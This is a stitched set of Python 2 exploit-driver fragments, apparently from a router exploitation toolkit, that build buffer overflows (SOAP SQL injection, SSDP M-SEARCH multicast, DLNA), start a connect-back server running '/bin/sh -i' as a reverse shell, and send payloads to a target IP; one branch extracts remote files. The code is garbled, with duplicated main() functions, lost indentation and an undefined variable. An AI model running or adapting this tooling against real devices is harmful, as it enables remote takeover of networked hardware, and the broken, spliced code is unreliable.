def main(command):
logger=Logging()
logger.LOG_INFO("Bulding overflow.")
buf=build_overflow(logger)
if command.startswith("find="):
find_string=command.split("find=")[1]
offset=find_offset(buf,find_string)
logger.LOG_INFO("Offset of %s: %d" %(find_string,offset))
sys.exit(0)
logger.LOG_INFO("Starting server.")
server=ConnectbackServer(CALLBACK_IP,port=8080,logger=logger)
pid=server.serve()
target_ip=command
if pid:
try:
send_overflow(buf,target_ip,logger)
server.wait()
except Exception as e:
print e
server.shutdown()
else:
logger.LOG_WARN("Failed to start connect-back server.")
sys.exit(1)
logger.LOG_INFO("Done.")
def do_overflow(callback_ip,target):
Logging().LOG_INFO("doing overflow")
connectback_server=ConnectbackServer(callback_ip,startcmd="/bin/sh -i")
pid=connectback_server.serve()
time.sleep(1)
if pid:
try:
SoapSqlInjection(target,connectback_ip=callback_ip,action="overflow")
connectback_server.wait()
except Exception as e:
print e
Logging().LOG_WARN("Failed to connect. Killing connect-back server.")
connectback_server.shutdown()
raise e
else:
Logging().LOG_WARN("Failed to start connect-back server.")
def main(options):
logger=Logging()
logger.LOG_INFO("Bulding overflow.")
connectback_ip=options["connectback_ip"]
buf=build_overflow(connectback_ip,logger=logger)
if options.has_key("overflow_file"):
logger.LOG_INFO("Writing overflow string to file: %s" % options["overflow_file"])
open(options["overflow_file"],"wb").write(str(buf))
if options.has_key("find_string"):
find_string=options["find_string"]
offset=find_offset(buf,find_string)
logger.LOG_INFO("Offset of %s: %d" %(find_string,offset))
sys.exit(0)
logger.LOG_INFO("Starting server.")
try:
server=ConnectbackServer(connectback_ip,port=8080,logger=logger)
pid=server.serve()
except Exception as e:
logger.LOG_WARN("Failed to start connect-back server: %s" % str(e))
sys.exit(1)
if options.has_key("target"):
target_ip=options["target"]
target_ip=command
try:
send_overflow(buf,target_ip,logger)
server.wait()
except Exception as e:
print e
server.shutdown()
else:
try:
server.wait()
except:
server.shutdown()
logger.LOG_INFO("Done.")
msearch_string=msearch_crash.MsearchCrash(buffer_overflow_string)
pid=None
if len(sys.argv) > 1:
search_string=sys.argv[1]
if "0x" == search_string[0:2]:
search_string_num=int(search_string,0)
search_string=struct.pack(">L",search_string_num)
offset=buffer_overflow_string.find_offset(search_string)
if(offset < 0):
print "Couldn't find string %s in the overflow buffer." % search_string
else:
print "Found string %s at\noffset: %d" % (search_string,offset)
else:
pid=connectback_server.serve()
#sys.stdout.write(str(msearch_string))
if pid:
try:
logger.LOG_INFO("Sending exploit")
send_multicast("239.255.255.250",1900,str(msearch_string))
connectback_server.wait()
except Exception as e:
print e
connectback_server.shutdown()
else:
logger.LOG_WARN("Failed to start connect-backserver.")
sys.exit(1)
if search_value.startswith("0x"):
value = int(search_value, 16)
offset = buf.find_offset(value)
if (offset < 0):
print "Couldn't find value %s in the overflow buffer." % search_value
else:
print "Found value %s at\noffset: %d" % (search_value, offset)
exit(0)
addr = sys.argv[1]
port = int(sys.argv[2])
connectback_server = ConnectbackServer(CALLBACK_IP, startcmd="/bin/sh -i")
pid = connectback_server.serve()
time.sleep(1)
if pid:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((addr, port))
logger.LOG_INFO("sending exploit.")
sock.send(str(buf))
sock.close()
connectback_server.wait()
except Exception as e:
logger.LOG_WARN("Failed to connect. ")
logger.LOG_WARN("Failed to connect. Killing connect-back server.")
connectback_server.shutdown()
else:
logger.LOG_WARN("Failed to start connect-back server.")
sys.exit(1)
def main(options,logger=None):
outfile=None
path=None
connectback_ip=None
port=None
host=None
if not logger:
logger=Logging()
try:
port=options["port"]
except KeyError:
port=8200
try:
connectback_ip=options["connectback_ip"]
except KeyError:
pass
try:
host=options["target"]
except KeyError:
pass
try:
path=options["extract"]
except KeyError:
pass
if path:
try:
outfile=options["outfile"]
host=options["target"]
# logger.LOG_DEBUG("main() got path=%s" % path)
albumart_extract(host,path,outfile=outfile,logger=logger)
exit(0)
except KeyError:
print("File extraction requires a remote path, local file, and target IP address.")
usage(1)
if connectback_ip:
try:
logger.set_max_log_level(Logging.INFO)
buf=DLNA_Overflow(1536,connectback_ip,logger=logger).buf
logger.set_max_log_level(Logging.DEBUG)
except DLNAOverflowException as e:
logger.LOG_WARN("%s" % str(e))
exit(1)
try:
find_str=options["find_string"]
logger.LOG_INFO("Finding offset of %s" % find_str)
find=find_str
if find_str.startswith("0x"):
find=int(find_str,16)
offset=buf.find_offset(find)
logger.LOG_INFO("Offset: %s" % offset)
exit(0)
except KeyError:
pass
if not host:
print("Remote exploitation requires a target IP address.")
usage(1)
else:
print("No file extraction, overflow search string, or remote target was provided.")
usage(1)
if not do_verification(host,port=port,logger=logger):
exit(1)
server=ConnectbackServer(connectback_ip,startcmd="/bin/sh -i")
server.serve()
try:
do_overflow(host,buf,port=port,logger=logger)
except Exception as e:
server.shutdown()
raise e
server.wait()
